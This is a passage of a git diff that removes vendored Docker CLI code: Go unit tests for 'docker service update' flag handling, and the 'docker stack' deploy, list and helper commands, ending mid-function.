-	flags := newUpdateCommand(nil).Flags()
-	flags.Set("args", "the \"new args\"")
-
-	spec := &swarm.ServiceSpec{}
-	cspec := &spec.TaskTemplate.ContainerSpec
-	cspec.Args = []string{"old", "args"}
-
-	updateService(flags, spec)
-	assert.EqualStringSlice(t, cspec.Args, []string{"the", "new args"})
-}
-
-func TestUpdateLabels(t *testing.T) {
-	flags := newUpdateCommand(nil).Flags()
-	flags.Set("label-add", "toadd=newlabel")
-	flags.Set("label-rm", "toremove")
-
-	labels := map[string]string{
-		"toremove": "thelabeltoremove",
-		"tokeep":   "value",
-	}
-
-	updateLabels(flags, &labels)
-	assert.Equal(t, len(labels), 2)
-	assert.Equal(t, labels["tokeep"], "value")
-	assert.Equal(t, labels["toadd"], "newlabel")
-}
-
-func TestUpdateLabelsRemoveALabelThatDoesNotExist(t *testing.T) {
-	flags := newUpdateCommand(nil).Flags()
-	flags.Set("label-rm", "dne")
-
-	labels := map[string]string{"foo": "theoldlabel"}
-	updateLabels(flags, &labels)
-	assert.Equal(t, len(labels), 1)
-}
-
-func TestUpdatePlacement(t *testing.T) {
-	flags := newUpdateCommand(nil).Flags()
-	flags.Set("constraint-add", "node=toadd")
-	flags.Set("constraint-rm", "node!=toremove")
-
-	placement := &swarm.Placement{
-		Constraints: []string{"node!=toremove", "container=tokeep"},
-	}
-
-	updatePlacement(flags, placement)
-	assert.Equal(t, len(placement.Constraints), 2)
-	assert.Equal(t, placement.Constraints[0], "container=tokeep")
-	assert.Equal(t, placement.Constraints[1], "node=toadd")
-}
-
-func TestUpdateEnvironment(t *testing.T) {
-	flags := newUpdateCommand(nil).Flags()
-	flags.Set("env-add", "toadd=newenv")
-	flags.Set("env-rm", "toremove")
-
-	envs := []string{"toremove=theenvtoremove", "tokeep=value"}
-
-	updateEnvironment(flags, &envs)
-	assert.Equal(t, len(envs), 2)
-	// Order has been removed in updateEnvironment (map)
-	sort.Strings(envs)
-	assert.Equal(t, envs[0], "toadd=newenv")
-	assert.Equal(t, envs[1], "tokeep=value")
-}
-
-func TestUpdateEnvironmentWithDuplicateValues(t *testing.T) {
-	flags := newUpdateCommand(nil).Flags()
-	flags.Set("env-add", "foo=newenv")
-	flags.Set("env-add", "foo=dupe")
-	flags.Set("env-rm", "foo")
-
-	envs := []string{"foo=value"}
-
-	updateEnvironment(flags, &envs)
-	assert.Equal(t, len(envs), 0)
-}
-
-func TestUpdateEnvironmentWithDuplicateKeys(t *testing.T) {
-	// Test case for #25404
-	flags := newUpdateCommand(nil).Flags()
-	flags.Set("env-add", "A=b")
-
-	envs := []string{"A=c"}
-
-	updateEnvironment(flags, &envs)
-	assert.Equal(t, len(envs), 1)
-	assert.Equal(t, envs[0], "A=b")
-}
-
-func TestUpdateGroups(t *testing.T) {
-	flags := newUpdateCommand(nil).Flags()
-	flags.Set("group-add", "wheel")
-	flags.Set("group-add", "docker")
-	flags.Set("group-rm", "root")
-	flags.Set("group-add", "foo")
-	flags.Set("group-rm", "docker")
-
-	groups := []string{"bar", "root"}
-
-	updateGroups(flags, &groups)
-	assert.Equal(t, len(groups), 3)
-	assert.Equal(t, groups[0], "bar")
-	assert.Equal(t, groups[1], "foo")
-	assert.Equal(t, groups[2], "wheel")
-}
-
-func TestUpdateDNSConfig(t *testing.T) {
-	flags := newUpdateCommand(nil).Flags()
-
-	// IPv4, with duplicates
-	flags.Set("dns-add", "1.1.1.1")
-	flags.Set("dns-add", "1.1.1.1")
-	flags.Set("dns-add", "2.2.2.2")
-	flags.Set("dns-rm", "3.3.3.3")
-	flags.Set("dns-rm", "2.2.2.2")
-	// IPv6
-	flags.Set("dns-add", "2001:db8:abc8::1")
-	// Invalid dns record
-	assert.Error(t, flags.Set("dns-add", "x.y.z.w"), "x.y.z.w is not an ip address")
-
-	// domains with duplicates
-	flags.Set("dns-search-add", "example.com")
-	flags.Set("dns-search-add", "example.com")
-	flags.Set("dns-search-add", "example.org")
-	flags.Set("dns-search-rm", "example.org")
-	// Invalid dns search domain
-	assert.Error(t, flags.Set("dns-search-add", "example$com"), "example$com is not a valid domain")
-
-	flags.Set("dns-option-add", "ndots:9")
-	flags.Set("dns-option-rm", "timeout:3")
-
-	config := &swarm.DNSConfig{
-		Nameservers: []string{"3.3.3.3", "5.5.5.5"},
-		Search:      []string{"localdomain"},
-		Options:     []string{"timeout:3"},
-	}
-
-	updateDNSConfig(flags, &config)
-
-	assert.Equal(t, len(config.Nameservers), 3)
-	assert.Equal(t, config.Nameservers[0], "1.1.1.1")
-	assert.Equal(t, config.Nameservers[1], "2001:db8:abc8::1")
-	assert.Equal(t, config.Nameservers[2], "5.5.5.5")
-
-	assert.Equal(t, len(config.Search), 2)
-	assert.Equal(t, config.Search[0], "example.com")
-	assert.Equal(t, config.Search[1], "localdomain")
-
-	assert.Equal(t, len(config.Options), 1)
-	assert.Equal(t, config.Options[0], "ndots:9")
-}
-
-func TestUpdateMounts(t *testing.T) {
-	flags := newUpdateCommand(nil).Flags()
-	flags.Set("mount-add", "type=volume,source=vol2,target=/toadd")
-	flags.Set("mount-rm", "/toremove")
-
-	mounts := []mounttypes.Mount{
-		{Target: "/toremove", Source: "vol1", Type: mounttypes.TypeBind},
-		{Target: "/tokeep", Source: "vol3", Type: mounttypes.TypeBind},
-	}
-
-	updateMounts(flags, &mounts)
-	assert.Equal(t, len(mounts), 2)
-	assert.Equal(t, mounts[0].Target, "/toadd")
-	assert.Equal(t, mounts[1].Target, "/tokeep")
-
-}
-
-func TestUpdateMountsWithDuplicateMounts(t *testing.T) {
-	flags := newUpdateCommand(nil).Flags()
-	flags.Set("mount-add", "type=volume,source=vol4,target=/toadd")
-
-	mounts := []mounttypes.Mount{
-		{Target: "/tokeep1", Source: "vol1", Type: mounttypes.TypeBind},
-		{Target: "/toadd", Source: "vol2", Type: mounttypes.TypeBind},
-		{Target: "/tokeep2", Source: "vol3", Type: mounttypes.TypeBind},
-	}
-
-	updateMounts(flags, &mounts)
-	assert.Equal(t, len(mounts), 3)
-	assert.Equal(t, mounts[0].Target, "/tokeep1")
-	assert.Equal(t, mounts[1].Target, "/tokeep2")
-	assert.Equal(t, mounts[2].Target, "/toadd")
-}
-
-func TestUpdatePorts(t *testing.T) {
-	flags := newUpdateCommand(nil).Flags()
-	flags.Set("publish-add", "1000:1000")
-	flags.Set("publish-rm", "333/udp")
-
-	portConfigs := []swarm.PortConfig{
-		{TargetPort: 333, Protocol: swarm.PortConfigProtocolUDP},
-		{TargetPort: 555},
-	}
-
-	err := updatePorts(flags, &portConfigs)
-	assert.Equal(t, err, nil)
-	assert.Equal(t, len(portConfigs), 2)
-	// Do a sort to have the order (might have changed by map)
-	targetPorts := []int{int(portConfigs[0].TargetPort), int(portConfigs[1].TargetPort)}
-	sort.Ints(targetPorts)
-	assert.Equal(t, targetPorts[0], 555)
-	assert.Equal(t, targetPorts[1], 1000)
-}
-
-func TestUpdatePortsDuplicate(t *testing.T) {
-	// Test case for #25375
-	flags := newUpdateCommand(nil).Flags()
-	flags.Set("publish-add", "80:80")
-
-	portConfigs := []swarm.PortConfig{
-		{
-			TargetPort:    80,
-			PublishedPort: 80,
-			Protocol:      swarm.PortConfigProtocolTCP,
-			PublishMode:   swarm.PortConfigPublishModeIngress,
-		},
-	}
-
-	err := updatePorts(flags, &portConfigs)
-	assert.Equal(t, err, nil)
-	assert.Equal(t, len(portConfigs), 1)
-	assert.Equal(t, portConfigs[0].TargetPort, uint32(80))
-}
-
-func TestUpdateHealthcheckTable(t *testing.T) {
-	type test struct {
-		flags    [][2]string
-		initial  *container.HealthConfig
-		expected *container.HealthConfig
-		err      string
-	}
-	testCases := []test{
-		{
-			flags:    [][2]string{{"no-healthcheck", "true"}},
-			initial:  &container.HealthConfig{Test: []string{"CMD-SHELL", "cmd1"}, Retries: 10},
-			expected: &container.HealthConfig{Test: []string{"NONE"}},
-		},
-		{
-			flags:    [][2]string{{"health-cmd", "cmd1"}},
-			initial:  &container.HealthConfig{Test: []string{"NONE"}},
-			expected: &container.HealthConfig{Test: []string{"CMD-SHELL", "cmd1"}},
-		},
-		{
-			flags:    [][2]string{{"health-retries", "10"}},
-			initial:  &container.HealthConfig{Test: []string{"NONE"}},
-			expected: &container.HealthConfig{Retries: 10},
-		},
-		{
-			flags:    [][2]string{{"health-retries", "10"}},
-			initial:  &container.HealthConfig{Test: []string{"CMD", "cmd1"}},
-			expected: &container.HealthConfig{Test: []string{"CMD", "cmd1"}, Retries: 10},
-		},
-		{
-			flags:    [][2]string{{"health-interval", "1m"}},
-			initial:  &container.HealthConfig{Test: []string{"CMD", "cmd1"}},
-			expected: &container.HealthConfig{Test: []string{"CMD", "cmd1"}, Interval: time.Minute},
-		},
-		{
-			flags:    [][2]string{{"health-cmd", ""}},
-			initial:  &container.HealthConfig{Test: []string{"CMD", "cmd1"}, Retries: 10},
-			expected: &container.HealthConfig{Retries: 10},
-		},
-		{
-			flags:    [][2]string{{"health-retries", "0"}},
-			initial:  &container.HealthConfig{Test: []string{"CMD", "cmd1"}, Retries: 10},
-			expected: &container.HealthConfig{Test: []string{"CMD", "cmd1"}},
-		},
-		{
-			flags: [][2]string{{"health-cmd", "cmd1"}, {"no-healthcheck", "true"}},
-			err:   "--no-healthcheck conflicts with --health-* options",
-		},
-		{
-			flags: [][2]string{{"health-interval", "10m"}, {"no-healthcheck", "true"}},
-			err:   "--no-healthcheck conflicts with --health-* options",
-		},
-		{
-			flags: [][2]string{{"health-timeout", "1m"}, {"no-healthcheck", "true"}},
-			err:   "--no-healthcheck conflicts with --health-* options",
-		},
-	}
-	for i, c := range testCases {
-		flags := newUpdateCommand(nil).Flags()
-		for _, flag := range c.flags {
-			flags.Set(flag[0], flag[1])
-		}
-		cspec := &swarm.ContainerSpec{
-			Healthcheck: c.initial,
-		}
-		err := updateHealthcheck(flags, cspec)
-		if c.err != "" {
-			assert.Error(t, err, c.err)
-		} else {
-			assert.NilError(t, err)
-			if !reflect.DeepEqual(cspec.Healthcheck, c.expected) {
-				t.Errorf("incorrect result for test %d, expected health config:\n\t%#v\ngot:\n\t%#v", i, c.expected, cspec.Healthcheck)
-			}
-		}
-	}
-}
-
-func TestUpdateHosts(t *testing.T) {
-	flags := newUpdateCommand(nil).Flags()
-	flags.Set("host-add", "example.net:2.2.2.2")
-	flags.Set("host-add", "ipv6.net:2001:db8:abc8::1")
-	// remove with ipv6 should work
-	flags.Set("host-rm", "example.net:2001:db8:abc8::1")
-	// just hostname should work as well
-	flags.Set("host-rm", "example.net")
-	// bad format error
-	assert.Error(t, flags.Set("host-add", "$example.com$"), "bad format for add-host:")
-
-	hosts := []string{"1.2.3.4 example.com", "4.3.2.1 example.org", "2001:db8:abc8::1 example.net"}
-
-	updateHosts(flags, &hosts)
-	assert.Equal(t, len(hosts), 3)
-	assert.Equal(t, hosts[0], "1.2.3.4 example.com")
-	assert.Equal(t, hosts[1], "2001:db8:abc8::1 ipv6.net")
-	assert.Equal(t, hosts[2], "4.3.2.1 example.org")
-}
-
-func TestUpdatePortsRmWithProtocol(t *testing.T) {
-	flags := newUpdateCommand(nil).Flags()
-	flags.Set("publish-add", "8081:81")
-	flags.Set("publish-add", "8082:82")
-	flags.Set("publish-rm", "80")
-	flags.Set("publish-rm", "81/tcp")
-	flags.Set("publish-rm", "82/udp")
-
-	portConfigs := []swarm.PortConfig{
-		{
-			TargetPort:    80,
-			PublishedPort: 8080,
-			Protocol:      swarm.PortConfigProtocolTCP,
-			PublishMode:   swarm.PortConfigPublishModeIngress,
-		},
-	}
-
-	err := updatePorts(flags, &portConfigs)
-	assert.Equal(t, err, nil)
-	assert.Equal(t, len(portConfigs), 2)
-	assert.Equal(t, portConfigs[0].TargetPort, uint32(81))
-	assert.Equal(t, portConfigs[1].TargetPort, uint32(82))
-}
-
-// FIXME(vdemeester) port to opts.PortOpt
-func TestValidatePort(t *testing.T) {
-	validPorts := []string{"80/tcp", "80", "80/udp"}
-	invalidPorts := map[string]string{
-		"9999999":   "out of range",
-		"80:80/tcp": "invalid port format",
-		"53:53/udp": "invalid port format",
-		"80:80":     "invalid port format",
-		"80/xyz":    "invalid protocol",
-		"tcp":       "invalid syntax",
-		"udp":       "invalid syntax",
-		"":          "invalid protocol",
-	}
-	for _, port := range validPorts {
-		_, err := validatePublishRemove(port)
-		assert.Equal(t, err, nil)
-	}
-	for port, e := range invalidPorts {
-		_, err := validatePublishRemove(port)
-		assert.Error(t, err, e)
-	}
-}
diff --git a/vendor/github.com/docker/docker/cli/command/stack/cmd.go b/vendor/github.com/docker/docker/cli/command/stack/cmd.go
deleted file mode 100644
index 860bfedd1a..0000000000
--- a/vendor/github.com/docker/docker/cli/command/stack/cmd.go
+++ /dev/null
@@ -1,35 +0,0 @@
-package stack
-
-import (
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/spf13/cobra"
-)
-
-// NewStackCommand returns a cobra command for `stack` subcommands
-func NewStackCommand(dockerCli *command.DockerCli) *cobra.Command {
-	cmd := &cobra.Command{
-		Use:   "stack",
-		Short: "Manage Docker stacks",
-		Args:  cli.NoArgs,
-		RunE:  dockerCli.ShowHelp,
-		Tags:  map[string]string{"version": "1.25"},
-	}
-	cmd.AddCommand(
-		newDeployCommand(dockerCli),
-		newListCommand(dockerCli),
-		newRemoveCommand(dockerCli),
-		newServicesCommand(dockerCli),
-		newPsCommand(dockerCli),
-	)
-	return cmd
-}
-
-// NewTopLevelDeployCommand returns a command for `docker deploy`
-func NewTopLevelDeployCommand(dockerCli *command.DockerCli) *cobra.Command {
-	cmd := newDeployCommand(dockerCli)
-	// Remove the aliases at the top level
-	cmd.Aliases = []string{}
-	cmd.Tags = map[string]string{"experimental": "", "version": "1.25"}
-	return cmd
-}
diff --git a/vendor/github.com/docker/docker/cli/command/stack/common.go b/vendor/github.com/docker/docker/cli/command/stack/common.go
deleted file mode 100644
index 72719f94fc..0000000000
--- a/vendor/github.com/docker/docker/cli/command/stack/common.go
+++ /dev/null
@@ -1,60 +0,0 @@
-package stack
-
-import (
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/api/types/filters"
-	"github.com/docker/docker/api/types/swarm"
-	"github.com/docker/docker/cli/compose/convert"
-	"github.com/docker/docker/client"
-	"github.com/docker/docker/opts"
-)
-
-func getStackFilter(namespace string) filters.Args {
-	filter := filters.NewArgs()
-	filter.Add("label", convert.LabelNamespace+"="+namespace)
-	return filter
-}
-
-func getStackFilterFromOpt(namespace string, opt opts.FilterOpt) filters.Args {
-	filter := opt.Value()
-	filter.Add("label", convert.LabelNamespace+"="+namespace)
-	return filter
-}
-
-func getAllStacksFilter() filters.Args {
-	filter := filters.NewArgs()
-	filter.Add("label", convert.LabelNamespace)
-	return filter
-}
-
-func getServices(
-	ctx context.Context,
-	apiclient client.APIClient,
-	namespace string,
-) ([]swarm.Service, error) {
-	return apiclient.ServiceList(
-		ctx,
-		types.ServiceListOptions{Filters: getStackFilter(namespace)})
-}
-
-func getStackNetworks(
-	ctx context.Context,
-	apiclient client.APIClient,
-	namespace string,
-) ([]types.NetworkResource, error) {
-	return apiclient.NetworkList(
-		ctx,
-		types.NetworkListOptions{Filters: getStackFilter(namespace)})
-}
-
-func getStackSecrets(
-	ctx context.Context,
-	apiclient client.APIClient,
-	namespace string,
-) ([]swarm.Secret, error) {
-	return apiclient.SecretList(
-		ctx,
-		types.SecretListOptions{Filters: getStackFilter(namespace)})
-}
diff --git a/vendor/github.com/docker/docker/cli/command/stack/deploy.go b/vendor/github.com/docker/docker/cli/command/stack/deploy.go
deleted file mode 100644
index 980876a6a1..0000000000
--- a/vendor/github.com/docker/docker/cli/command/stack/deploy.go
+++ /dev/null
@@ -1,357 +0,0 @@
-package stack
-
-import (
-	"fmt"
-	"io/ioutil"
-	"os"
-	"sort"
-	"strings"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/api/types/swarm"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	secretcli "github.com/docker/docker/cli/command/secret"
-	"github.com/docker/docker/cli/compose/convert"
-	"github.com/docker/docker/cli/compose/loader"
-	composetypes "github.com/docker/docker/cli/compose/types"
-	dockerclient "github.com/docker/docker/client"
-	"github.com/pkg/errors"
-	"github.com/spf13/cobra"
-	"golang.org/x/net/context"
-)
-
-const (
-	defaultNetworkDriver = "overlay"
-)
-
-type deployOptions struct {
-	bundlefile       string
-	composefile      string
-	namespace        string
-	sendRegistryAuth bool
-}
-
-func newDeployCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts deployOptions
-
-	cmd := &cobra.Command{
-		Use:     "deploy [OPTIONS] STACK",
-		Aliases: []string{"up"},
-		Short:   "Deploy a new stack or update an existing stack",
-		Args:    cli.ExactArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.namespace = args[0]
-			return runDeploy(dockerCli, opts)
-		},
-	}
-
-	flags := cmd.Flags()
-	addBundlefileFlag(&opts.bundlefile, flags)
-	addComposefileFlag(&opts.composefile, flags)
-	addRegistryAuthFlag(&opts.sendRegistryAuth, flags)
-	return cmd
-}
-
-func runDeploy(dockerCli *command.DockerCli, opts deployOptions) error {
-	ctx := context.Background()
-
-	switch {
-	case opts.bundlefile == "" && opts.composefile == "":
-		return fmt.Errorf("Please specify either a bundle file (with --bundle-file) or a Compose file (with --compose-file).")
-	case opts.bundlefile != "" && opts.composefile != "":
-		return fmt.Errorf("You cannot specify both a bundle file and a Compose file.")
-	case opts.bundlefile != "":
-		return deployBundle(ctx, dockerCli, opts)
-	default:
-		return deployCompose(ctx, dockerCli, opts)
-	}
-}
-
-// checkDaemonIsSwarmManager does an Info API call to verify that the daemon is
-// a swarm manager. This is necessary because we must create networks before we
-// create services, but the API call for creating a network does not return a
-// proper status code when it can't create a network in the "global" scope.
-func checkDaemonIsSwarmManager(ctx context.Context, dockerCli *command.DockerCli) error {
-	info, err := dockerCli.Client().Info(ctx)
-	if err != nil {
-		return err
-	}
-	if !info.Swarm.ControlAvailable {
-		return errors.New("This node is not a swarm manager. Use \"docker swarm init\" or \"docker swarm join\" to connect this node to swarm and try again.")
-	}
-	return nil
-}
-
-func deployCompose(ctx context.Context, dockerCli *command.DockerCli, opts deployOptions) error {
-	configDetails, err := getConfigDetails(opts)
-	if err != nil {
-		return err
-	}
-
-	config, err := loader.Load(configDetails)
-	if err != nil {
-		if fpe, ok := err.(*loader.ForbiddenPropertiesError); ok {
-			return fmt.Errorf("Compose file contains unsupported options:\n\n%s\n",
-				propertyWarnings(fpe.Properties))
-		}
-
-		return err
-	}
-
-	unsupportedProperties := loader.GetUnsupportedProperties(configDetails)
-	if len(unsupportedProperties) > 0 {
-		fmt.Fprintf(dockerCli.Err(), "Ignoring unsupported options: %s\n\n",
-			strings.Join(unsupportedProperties, ", "))
-	}
-
-	deprecatedProperties := loader.GetDeprecatedProperties(configDetails)
-	if len(deprecatedProperties) > 0 {
-		fmt.Fprintf(dockerCli.Err(), "Ignoring deprecated options:\n\n%s\n\n",
-			propertyWarnings(deprecatedProperties))
-	}
-
-	if err := checkDaemonIsSwarmManager(ctx, dockerCli); err != nil {
-		return err
-	}
-
-	namespace := convert.NewNamespace(opts.namespace)
-
-	serviceNetworks := getServicesDeclaredNetworks(config.Services)
-	networks, externalNetworks := convert.Networks(namespace, config.Networks, serviceNetworks)
-	if err := validateExternalNetworks(ctx, dockerCli, externalNetworks); err != nil {
-		return err
-	}
-	if err := createNetworks(ctx, dockerCli, namespace, networks); err != nil {
-		return err
-	}
-
-	secrets, err := convert.Secrets(namespace, config.Secrets)
-	if err != nil {
-		return err
-	}
-	if err := createSecrets(ctx, dockerCli, namespace, secrets); err != nil {
-		return err
-	}
-
-	services, err := convert.Services(namespace, config, dockerCli.Client())
-	if err != nil {
-		return err
-	}
-	return deployServices(ctx, dockerCli, services, namespace, opts.sendRegistryAuth)
-}
-func getServicesDeclaredNetworks(serviceConfigs []composetypes.ServiceConfig) map[string]struct{} {
-	serviceNetworks := map[string]struct{}{}
-	for _, serviceConfig := range serviceConfigs {
-		if len(serviceConfig.Networks) == 0 {
-			serviceNetworks["default"] = struct{}{}
-			continue
-		}
-		for network := range serviceConfig.Networks {
-			serviceNetworks[network] = struct{}{}
-		}
-	}
-	return serviceNetworks
-}
-
-func propertyWarnings(properties map[string]string) string {
-	var msgs []string
-	for name, description := range properties {
-		msgs = append(msgs, fmt.Sprintf("%s: %s", name, description))
-	}
-	sort.Strings(msgs)
-	return strings.Join(msgs, "\n\n")
-}
-
-func getConfigDetails(opts deployOptions) (composetypes.ConfigDetails, error) {
-	var details composetypes.ConfigDetails
-	var err error
-
-	details.WorkingDir, err = os.Getwd()
-	if err != nil {
-		return details, err
-	}
-
-	configFile, err := getConfigFile(opts.composefile)
-	if err != nil {
-		return details, err
-	}
-	// TODO: support multiple files
-	details.ConfigFiles = []composetypes.ConfigFile{*configFile}
-	return details, nil
-}
-
-func getConfigFile(filename string) (*composetypes.ConfigFile, error) {
-	bytes, err := ioutil.ReadFile(filename)
-	if err != nil {
-		return nil, err
-	}
-	config, err := loader.ParseYAML(bytes)
-	if err != nil {
-		return nil, err
-	}
-	return &composetypes.ConfigFile{
-		Filename: filename,
-		Config:   config,
-	}, nil
-}
-
-func validateExternalNetworks(
-	ctx context.Context,
-	dockerCli *command.DockerCli,
-	externalNetworks []string) error {
-	client := dockerCli.Client()
-
-	for _, networkName := range externalNetworks {
-		network, err := client.NetworkInspect(ctx, networkName)
-		if err != nil {
-			if dockerclient.IsErrNetworkNotFound(err) {
-				return fmt.Errorf("network %q is declared as external, but could not be found. You need to create the network before the stack is deployed (with overlay driver)", networkName)
-			}
-			return err
-		}
-		if network.Scope != "swarm" {
-			return fmt.Errorf("network %q is declared as external, but it is not in the right scope: %q instead of %q", networkName, network.Scope, "swarm")
-		}
-	}
-
-	return nil
-}
-
-func createSecrets(
-	ctx context.Context,
-	dockerCli *command.DockerCli,
-	namespace convert.Namespace,
-	secrets []swarm.SecretSpec,
-) error {
-	client := dockerCli.Client()
-
-	for _, secretSpec := range secrets {
-		// TODO: fix this after https://github.com/docker/docker/pull/29218
-		secrets, err := secretcli.GetSecretsByNameOrIDPrefixes(ctx, client, []string{secretSpec.Name})
-		switch {
-		case err != nil:
-			return err
-		case len(secrets) > 1:
-			return errors.Errorf("ambiguous secret name: %s", secretSpec.Name)
-		case len(secrets) == 0:
-			fmt.Fprintf(dockerCli.Out(), "Creating secret %s\n", secretSpec.Name)
-			_, err = client.SecretCreate(ctx, secretSpec)
-		default:
-			secret := secrets[0]
-			// Update secret to ensure that the local data hasn't changed
-			err = client.SecretUpdate(ctx, secret.ID, secret.Meta.Version, secretSpec)
-		}
-		if err != nil {
-			return err
-		}
-	}
-	return nil
-}
-
-func createNetworks(
-	ctx context.Context,
-	dockerCli *command.DockerCli,
-	namespace convert.Namespace,
-	networks map[string]types.NetworkCreate,
-) error {
-	client := dockerCli.Client()
-
-	existingNetworks, err := getStackNetworks(ctx, client, namespace.Name())
-	if err != nil {
-		return err
-	}
-
-	existingNetworkMap := make(map[string]types.NetworkResource)
-	for _, network := range existingNetworks {
-		existingNetworkMap[network.Name] = network
-	}
-
-	for internalName, createOpts := range networks {
-		name := namespace.Scope(internalName)
-		if _, exists := existingNetworkMap[name]; exists {
-			continue
-		}
-
-		if createOpts.Driver == "" {
-			createOpts.Driver = defaultNetworkDriver
-		}
-
-		fmt.Fprintf(dockerCli.Out(), "Creating network %s\n", name)
-		if _, err := client.NetworkCreate(ctx, name, createOpts); err != nil {
-			return err
-		}
-	}
-
-	return nil
-}
-
-func deployServices(
-	ctx context.Context,
-	dockerCli *command.DockerCli,
-	services map[string]swarm.ServiceSpec,
-	namespace convert.Namespace,
-	sendAuth bool,
-) error {
-	apiClient := dockerCli.Client()
-	out := dockerCli.Out()
-
-	existingServices, err := getServices(ctx, apiClient, namespace.Name())
-	if err != nil {
-		return err
-	}
-
-	existingServiceMap := make(map[string]swarm.Service)
-	for _, service := range existingServices {
-		existingServiceMap[service.Spec.Name] = service
-	}
-
-	for internalName, serviceSpec := range services {
-		name := namespace.Scope(internalName)
-
-		encodedAuth := ""
-		if sendAuth {
-			// Retrieve encoded auth token from the image reference
-			image := serviceSpec.TaskTemplate.ContainerSpec.Image
-			encodedAuth, err = command.RetrieveAuthTokenFromImage(ctx, dockerCli, image)
-			if err != nil {
-				return err
-			}
-		}
-
-		if service, exists := existingServiceMap[name]; exists {
-			fmt.Fprintf(out, "Updating service %s (id: %s)\n", name, service.ID)
-
-			updateOpts := types.ServiceUpdateOptions{}
-			if sendAuth {
-				updateOpts.EncodedRegistryAuth = encodedAuth
-			}
-			response, err := apiClient.ServiceUpdate(
-				ctx,
-				service.ID,
-				service.Version,
-				serviceSpec,
-				updateOpts,
-			)
-			if err != nil {
-				return err
-			}
-
-			for _, warning := range response.Warnings {
-				fmt.Fprintln(dockerCli.Err(), warning)
-			}
-		} else {
-			fmt.Fprintf(out, "Creating service %s\n", name)
-
-			createOpts := types.ServiceCreateOptions{}
-			if sendAuth {
-				createOpts.EncodedRegistryAuth = encodedAuth
-			}
-			if _, err := apiClient.ServiceCreate(ctx, serviceSpec, createOpts); err != nil {
-				return err
-			}
-		}
-	}
-
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/stack/deploy_bundlefile.go b/vendor/github.com/docker/docker/cli/command/stack/deploy_bundlefile.go
deleted file mode 100644
index 5a178c4ab6..0000000000
--- a/vendor/github.com/docker/docker/cli/command/stack/deploy_bundlefile.go
+++ /dev/null
@@ -1,83 +0,0 @@
-package stack
-
-import (
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/api/types/swarm"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/cli/compose/convert"
-)
-
-func deployBundle(ctx context.Context, dockerCli *command.DockerCli, opts deployOptions) error {
-	bundle, err := loadBundlefile(dockerCli.Err(), opts.namespace, opts.bundlefile)
-	if err != nil {
-		return err
-	}
-
-	if err := checkDaemonIsSwarmManager(ctx, dockerCli); err != nil {
-		return err
-	}
-
-	namespace := convert.NewNamespace(opts.namespace)
-
-	networks := make(map[string]types.NetworkCreate)
-	for _, service := range bundle.Services {
-		for _, networkName := range service.Networks {
-			networks[networkName] = types.NetworkCreate{
-				Labels: convert.AddStackLabel(namespace, nil),
-			}
-		}
-	}
-
-	services := make(map[string]swarm.ServiceSpec)
-	for internalName, service := range bundle.Services {
-		name := namespace.Scope(internalName)
-
-		var ports []swarm.PortConfig
-		for _, portSpec := range service.Ports {
-			ports = append(ports, swarm.PortConfig{
-				Protocol:   swarm.PortConfigProtocol(portSpec.Protocol),
-				TargetPort: portSpec.Port,
-			})
-		}
-
-		nets := []swarm.NetworkAttachmentConfig{}
-		for _, networkName := range service.Networks {
-			nets = append(nets, swarm.NetworkAttachmentConfig{
-				Target:  namespace.Scope(networkName),
-				Aliases: []string{networkName},
-			})
-		}
-
-		serviceSpec := swarm.ServiceSpec{
-			Annotations: swarm.Annotations{
-				Name:   name,
-				Labels: convert.AddStackLabel(namespace, service.Labels),
-			},
-			TaskTemplate: swarm.TaskSpec{
-				ContainerSpec: swarm.ContainerSpec{
-					Image:   service.Image,
-					Command: service.Command,
-					Args:    service.Args,
-					Env:     service.Env,
-					// Service Labels will not be copied to Containers
-					// automatically during the deployment so we apply
-					// it here.
-					Labels: convert.AddStackLabel(namespace, nil),
-				},
-			},
-			EndpointSpec: &swarm.EndpointSpec{
-				Ports: ports,
-			},
-			Networks: nets,
-		}
-
-		services[internalName] = serviceSpec
-	}
-
-	if err := createNetworks(ctx, dockerCli, namespace, networks); err != nil {
-		return err
-	}
-	return deployServices(ctx, dockerCli, services, namespace, opts.sendRegistryAuth)
-}
diff --git a/vendor/github.com/docker/docker/cli/command/stack/list.go b/vendor/github.com/docker/docker/cli/command/stack/list.go
deleted file mode 100644
index 9b6c645e29..0000000000
--- a/vendor/github.com/docker/docker/cli/command/stack/list.go
+++ /dev/null
@@ -1,113 +0,0 @@
-package stack
-
-import (
-	"fmt"
-	"io"
-	"strconv"
-	"text/tabwriter"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/cli/compose/convert"
-	"github.com/docker/docker/client"
-	"github.com/spf13/cobra"
-)
-
-const (
-	listItemFmt = "%s\t%s\n"
-)
-
-type listOptions struct {
-}
-
-func newListCommand(dockerCli *command.DockerCli) *cobra.Command {
-	opts := listOptions{}
-
-	cmd := &cobra.Command{
-		Use:     "ls",
-		Aliases: []string{"list"},
-		Short:   "List stacks",
-		Args:    cli.NoArgs,
-		RunE: func(cmd *cobra.Command, args []string) error {
-			return runList(dockerCli, opts)
-		},
-	}
-
-	return cmd
-}
-
-func runList(dockerCli *command.DockerCli, opts listOptions) error {
-	client := dockerCli.Client()
-	ctx := context.Background()
-
-	stacks, err := getStacks(ctx, client)
-	if err != nil {
-		return err
-	}
-
-	out := dockerCli.Out()
-	printTable(out, stacks)
-	return nil
-}
-
-func printTable(out io.Writer, stacks []*stack) {
-	writer := tabwriter.NewWriter(out, 0, 4, 2, ' ', 0)
-
-	// Ignore flushing errors
-	defer writer.Flush()
-
-	fmt.Fprintf(writer, listItemFmt, "NAME", "SERVICES")
-	for _, stack := range stacks {
-		fmt.Fprintf(
-			writer,
-			listItemFmt,
-			stack.Name,
-			strconv.Itoa(stack.Services),
-		)
-	}
-}
-
-type stack struct {
-	// Name is the name of the stack
-	Name string
-	// Services is the number of the services
-	Services int
-}
-
-func getStacks(
-	ctx context.Context,
-	apiclient client.APIClient,
